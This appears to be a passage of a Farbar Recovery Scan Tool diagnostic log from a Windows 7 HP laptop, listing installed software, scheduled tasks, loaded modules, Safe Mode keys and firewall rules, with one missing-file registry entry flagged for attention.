(HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)Copy (x32 Version: 140.0.212.000 - Hewlett-Packard) HiddenCradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) HiddenD3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) HiddenDestinations (x32 Version: 140.0.77.000 - Hewlett-Packard) HiddenDeviceDiscovery (x32 Version: 140.0.212.000 - Hewlett-Packard) HiddenDiablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)DiskCryptor 1.1 (HKLM\...\DiskCryptor_is1) (Version: 1.1 - hxxp://diskcryptor.net/)DJ_AIO_06_F4500_SW_MIN (x32 Version: 140.0.690.000 - Hewlett-Packard) HiddenDora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) HiddenESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{E1ACF120-CD69-47F0-B202-9A4B95C436D8}) (Version: 5.1.5 - Hewlett-Packard)F4500 (x32 Version: 140.0.690.000 - Hewlett-Packard) HiddenFallout (HKLM-x32\...\Steam App 38400) (Version: - Interplay Inc.)Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) HiddenFarmscapes (x32 Version: 2.2.0.98 - WildTangent) HiddenFinal Drive Fury (x32 Version: 2.2.0.95 - WildTangent) HiddenGoogle Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.111 - Google Inc.)Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) HiddenHewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) HiddenHoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) HiddenHP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)HP Deskjet F4500 All-in-One Driver Software 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)HP Documentation (HKLM-x32\...\{89A12FD9-8FA0-4EB9-AE9A-34C7EB25C25B}) (Version: 1.1.0.0 - Hewlett-Packard)HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)HP Setup (HKLM-x32\...\{438363A8-F486-4C37-834C-4955773CB3D3}) (Version: 9.1.15430.4033 - Hewlett-Packard Company)HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.00.57 - Hewlett-Packard)HP Software Framework (HKLM-x32\...\{DB97D0DE-0AA1-413C-8398-92C7FA3F4A67}) (Version: 4.6.13.1 - Hewlett-Packard Company)HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) HiddenIBM SPSS Amos 22 (HKLM-x32\...\{DEB57287-C937-4DE9-939A-5ED3AB8F052D}) (Version: 22.0.0.0 - IBM Corp)IBM SPSS Statistics 22 (HKLM\...\{104875A1-D083-4A34-BC4F-3F635B7F8EF7}) (Version: 22.0.0.0 - IBM Corp)IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6491.0 - IDT)Inst5675 (Version: 8.00.57 - Softex Inc.) HiddenInst5676 (Version: 8.00.57 - Softex Inc.) HiddenIntel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3304 - Intel Corporation)Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)Intel® Smart Connect Technology (HKLM\...\{9B5FD763-5074-474C-B898-24567E6450C8}) (Version: 4.2.40.2439 - Intel Corporation)Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.1.28 - Intel Corporation)Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) HiddenJewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) HiddenJohn Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) HiddenKeyScrambler (HKLM-x32\...\KeyScrambler) (Version: 3.8.2.0 - QFX Software Corporation)Luxor HD (x32 Version: 2.2.0.98 - WildTangent) HiddenMah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) HiddenMalwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)McAfee Internet Security (HKLM-x32\...\MSC) (Version: 14.0.4121 - McAfee, Inc.)McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 15.0.4787.1002 - Microsoft Corporation)Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) HiddenMSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)Network64 (Version: 140.0.215.000 - Hewlett-Packard) HiddenNVIDIA GeForce Experience 2.5.15.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.15.54 - NVIDIA Corporation)NVIDIA Graphics Driver 358.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 358.91 - NVIDIA Corporation)NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) HiddenOffice 15 Click-to-Run Licensing Component (Version: 15.0.4787.1002 - Microsoft Corporation) HiddenOffice 15 Click-to-Run Localization Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) Hiddenopensource (x32 Version: 1.0.14960.3876 - Your Company Name) HiddenPenguins! (x32 Version: 2.2.0.98 - WildTangent) HiddenPlants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) HiddenPoker Superstars III (x32 Version: 2.2.0.95 - WildTangent) HiddenPolar Bowler (x32 Version: 2.2.0.97 - WildTangent) HiddenPolar Golfer (x32 Version: 2.2.0.98 - WildTangent) HiddenRealtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21239 - Realtek Semiconductor Corp.)Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.77.1126.2013 - Realtek)REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.00.13.1216 - REALTEK Semiconductor Corp.)RollerCoaster Tycoon 3: Platinum (x32 Version: 2.2.0.98 - WildTangent) HiddenSafeConnect (HKLM-x32\...\SafeConnect) (Version: - )Scan (x32 Version: 140.0.80.000 - Hewlett-Packard) HiddenSHIELD Streaming (Version: 4.1.500 - NVIDIA Corporation) HiddenSHIELD Wireless Controller Driver (Version: 2.5.15.54 - NVIDIA Corporation) HiddenSkype™ 6.3 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.3.107 - Skype Technologies S.A.)Status (x32 Version: 140.0.212.000 - Hewlett-Packard) HiddenSteam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) HiddenSynaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.8.0 - Synaptics Incorporated)Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) HiddenTorchlight (x32 Version: 2.2.0.98 - WildTangent) HiddenTrayApp (x32 Version: 140.0.212.000 - Hewlett-Packard) HiddenUpdate Installer for WildTangent Games App (x32 Version: - WildTangent) HiddenValidity WBF DDK (HKLM\...\{21498212-1146-4540-8A81-6A1328BA19F2}) (Version: 4.5.228.0 - Validity Sensors, Inc.)Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) HiddenVLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)WebReg (x32 Version: 140.0.212.017 - Hewlett-Packard) HiddenWildTangent Games App (HP Games) (x32 Version: 4.0.5.36 - WildTangent) HiddenWindows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)Zotero Standalone 4.0.28.7 (x86 en-US) (HKLM-x32\...\Zotero Standalone 4.0.28.7 (x86 en-US)) (Version: 4.0.28.7 - Zotero)Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3021336051-3703432070-3051997390-1001_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\zipfldr.dll => No File <==== ATTENTION ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {13ACC4BF-0F9A-43F8-A576-AC0BFD043429} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-01-19] (Microsoft Corporation)Task: {35C83673-4B92-44E8-A1BD-9DA5814F8342} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)Task: {3DC4B999-9EC9-42E9-8B06-BA7AD3D2CF43} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-14] (Google Inc.)Task: {46957D93-6E46-43E8-83BE-42B9419A3172} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)Task: {4CB4CF07-7AA0-4C1D-9D76-F8BE85946DF6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-11-27] (Microsoft Corporation)Task: {51B77C58-DFDD-43E7-87CA-978DB66FE6F2} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= autoTask: {5DC5EF17-C0D8-45CD-90EB-16B55E57BE15} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-14] (Google Inc.)Task: {5E24C299-9CA2-4FC6-A7C2-24E2EDDA727B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [2015-07-21] (McAfee, Inc.)Task: {5FC584DF-5921-48C3-A06E-E98FF2FE90A6} - System32\Tasks\HPCeeScheduleForRich => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)Task: {634F5330-103A-4525-B323-D8B6D96E64D3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2013-12-06] (Adobe Systems Incorporated)Task: {6404845D-103D-4944-816A-17D2A103EB25} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)Task: {B22F74D5-B3C1-4122-B6EF-690293853041} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2015-11-27] (Microsoft Corporation)Task: {C6B14674-F255-49C6-84FE-567443005321} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exeTask: {D2DB7714-EA3F-481B-BD04-771D36D27EF6} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)Task: {D4083049-B269-4810-A49B-1655215F2A34} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2013-06-07] (Hewlett-Packard Development Company, L.P.)Task: {D9DD000F-1831-41EE-8CF0-991AA03F70CE} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\HPCeeScheduleForRich.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2013-10-14 14:23 - 2013-10-14 14:23 - 00109568 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe2013-10-14 14:24 - 2013-10-14 14:24 - 00627200 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cachedrv.dll2013-10-14 14:25 - 2013-10-14 14:25 - 02541056 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll2013-10-14 14:22 - 2013-10-14 14:22 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll2013-10-14 14:22 - 2013-10-14 14:22 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll2013-10-14 14:22 - 2013-10-14 14:22 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll2013-10-14 14:35 - 2013-10-14 14:35 - 00306064 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll2013-10-14 14:35 - 2013-10-14 14:35 - 01297296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll2014-03-02 03:55 - 2015-11-05 12:13 - 00012080 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll2014-03-02 03:55 - 2015-11-05 10:13 - 00116528 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll2015-12-06 09:50 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll2013-08-12 22:06 - 2013-08-12 22:06 - 00198120 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe2013-08-12 22:06 - 2013-08-12 22:06 - 00054760 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\NetworkHeuristic.dll2013-08-12 22:06 - 2013-08-12 22:06 - 00034792 _____ () C:\Program Files\Intel\Intel® Smart Connect Technology Agent\ISCTNetMon.dll2015-11-27 09:44 - 2015-11-27 09:44 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll2013-10-14 14:30 - 2013-10-14 14:30 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe2015-09-23 13:53 - 2015-09-23 13:53 - 00063376 _____ () C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\zlib1.dll2015-11-15 14:43 - 2015-11-05 12:13 - 00011896 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll2015-11-27 09:44 - 2015-11-27 09:44 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll2015-11-15 14:47 - 2015-11-05 12:13 - 00013088 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll2014-03-02 03:56 - 2013-08-09 07:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll2016-01-14 20:46 - 2016-01-12 11:35 - 01590088 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libglesv2.dll2016-01-14 20:46 - 2016-01-12 11:35 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libegl.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" ==================== EXE Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\sharepoint.com -> hxxps://uflorida.sharepoint.com ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2016-01-09 08:30 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Rich\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpgDNS Servers: 68.105.28.11 - 68.105.29.11HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (Currently there is no automatic fix for this section.) ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{D7ABFE9A-E225-4F1D-AEC0-2A5DB5CE2AE1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exeFirewallRules: [{A78C9889-E9F3-45B3-B889-7989535434E4}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exeFirewallRules: [{02E2DB9E-78F5-4934-83D6-5F6202E26274}] => (Allow) LPort=2869FirewallRules: [{9C001F44-D48A-4A22-8F28-3C46B9FAD10D}] => (Allow) LPort=1900FirewallRules: [sPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exeFirewallRules: [sPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exeFirewallRules: [{05A2AA6B-02AF-4F25-8CEE-51EAB88F6A53}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exeFirewallRules: [{4B069B06-15E4-4A84-A1FF-5074607FC2DD}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exeFirewallRules: [{9C890246-5B35-4ECE-912A-18EBD522BEFC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exeFirewallRules: [{5417B5C0-8DFB-44AC-A5F9-3BA1B72EC631}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exeFirewallRules: [{DD170835-0231-45CD-9A6B-586A08F6DA4B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exeFirewallRules: [{3A1511B2-58C9-4C3C-85A4-851EDC5055F1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exeFirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exeFirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exeFirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exeFirewallRules: [{6239B12C-7670-4837-AC70-8D846F8D6D24}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exeFirewallRules: [{D1E07994-613D-430B-9DED-98FA71F4E62C}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exeFirewallRules: [{795E0BBD-9BE0-46D3-AA22-51BAFDD7D5D1}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exeFirewallRules: [{0FE690DC-848F-488A-A3B2-9A6C70250654}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exeFirewallRules: [{17464E33-DB6A-4831-AC0A-6FE0DB7FDAA9}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exeFirewallRules: [{EAA2FFF4-4A67-4959-BE21-60E5A8C4D392}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{5F6C3710-4F7D-489A-BF1C-A17113454E6A}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{F83A42FA-BFA4-491E-B8D4-A78D04E5ADCA}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{D6C16BE9-A88E-4849-B43B-1715CF34CD5C}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{464DEB20-4A8E-466F-8E95-CC5B49F5127B}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{2301AD9B-BA6D-4B06-936F-12CAAF535532}] => (Allow) C:\Users\Rich\AppData\Roaming\uTorrent\uTorrent.exeFirewallRules: [{52912FE9-6064-4864-984A-5DC00BB73904}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exeFirewallRules: [TCP Query User{E906B1E5-0694-466B-A234-027C7E6546CF}C:\program files\ibm\spss\statistics\22\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\22\jre\bin\javaw.exeFirewallRules: [uDP Query User{0D224099-4AA5-478C-A7EC-CC81C25BAB5D}C:\program files\ibm\spss\statistics\22\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\22\jre\bin\javaw.exeFirewallRules: [{7FF7EA9D-BF95-4873-A136-4C32FECE481B}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exeFirewallRules: [{D3C5086C-47B5-46FD-AE95-B42F45DD2234}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exeFirewallRules: [{79665AA1-625F-4251-90A5-6540EF9081A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exeFirewallRules: [{CB76C729-C342-4690-A909-2225EA6BACAF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exeFirewallRules: [{70E94F28-DC8A-4622-91B4-1BACB64358DE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exeFirewallRules: [{F984028F-4050-40B8-BA3E-5F57DB243F24}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exeFirewallRules: [{0614E9FC-35F7-43BC-A08F-3213D7E0D09D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exeFirewallRules: [{AF51506C-5BBC-4602-AAFC-8102A03E87F8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exeFirewallRules: [{3A35D498-CEB9-4803-A824-C7A01D1A5EC8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exeFirewallRules: [{000E7601-A00B-424D-A874-FCCEE8AE04CB}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exeFirewallRules: [{F12A764E-5B80-49C7-81EC-4E0A092FB4AA}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exeFirewallRules: [{8F6DC395-3EC0-4DF2-9CB2-D87372FC6FA9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exeFirewallRules: [{99BE522D-5CB5-46E9-982B-7279E4229AF9}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exeFirewallRules: 